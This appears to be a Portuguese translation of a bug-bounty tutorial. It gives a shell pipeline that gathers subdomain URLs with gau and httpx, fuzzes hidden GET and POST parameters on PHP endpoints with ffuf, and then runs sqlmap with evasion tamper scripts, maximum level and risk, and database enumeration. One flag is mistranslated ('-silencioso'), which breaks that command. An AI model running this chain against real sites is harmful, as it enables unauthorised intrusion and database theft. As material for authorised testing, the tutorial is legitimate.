FUZZING PARA PARAMAIS ESCONDIDOS

Tradutor: Mr.VeRoN

Artigo: https://medium.com/@calfcrusher/fuzzing-for-hidden-params-671724bf3fd7

Olá amigos hackers, hoje eu quero mostrar a vocês um método para fuzz de params ocultos, especialmente em endpoints PHP.

Vamos começar !

1. Obter URLs de subdomínios usando gau

$ cat subdomains.txt | gau --blacklist png,jpg,gif,jpeg,swf,woff,svg,pdf,tiff,tif,bmp,webp,ico,mp4,mov,js,css,eps,raw | tee all_urls.txt

2. Limpe os URLs e verifique o código de status http 200

$ cat all_urls.txt | uro | httpx -mc 200 -silencioso | tee live_urls.txt

3. Grep todos os endpoints php

$ cat live_urls.txt | grep “.php” | cut -f1 -d”?” | sed 's:/*$::' | sort -u > php_endpoints_urls.txt

4. Fuzz possíveis parâmetros ocultos com ffuf

GET

$ for URL in $(<php_endpoints_urls.txt); do (ffuf -u “${URL}?FUZZ=1” -w params_list.txt -mc 200 -ac -sa -t 20 -or -od ffuf_hidden_params_sqli_injections); done

POST

$ for URL in $(<php_endpoints_urls.txt); do (ffuf -X POST -u “${URL}” -w params_list.txt -mc 200 -ac -sa -t 20 -or -od ffuf_hidden_params_sqli_injections -d “FUZZ=1”); done

Se você encontrou um parâmetro válido oculto, pode ser possível que seja vulnerável à injeção de sql, então a próxima etapa será verificar esses parâmetros de URL que eles retornaram o código de status 200 com SQLMAP, assim:

$ sqlmap -u “URL” -- random-agent --tamper=”between,randomcase,space2comment” -v 2 --dbs --level 5 --risk 3 --batch

Encontrei alguns SQL Injection em programas VPD com este método :)

Você pode aplicar o mesmo método a arquivos .asp(x)

RECURSO

Para lista de parâmetros, tente isto:

https://github.com/Bo0oM/ParamPamPam/blob/master/params.txt

É claro que você pode gerar uma lista personalizada para o seu destino.

Experimente também https://github.com/s0md3v/Arjun um conjunto abrangente de descoberta de parâmetros HTTP.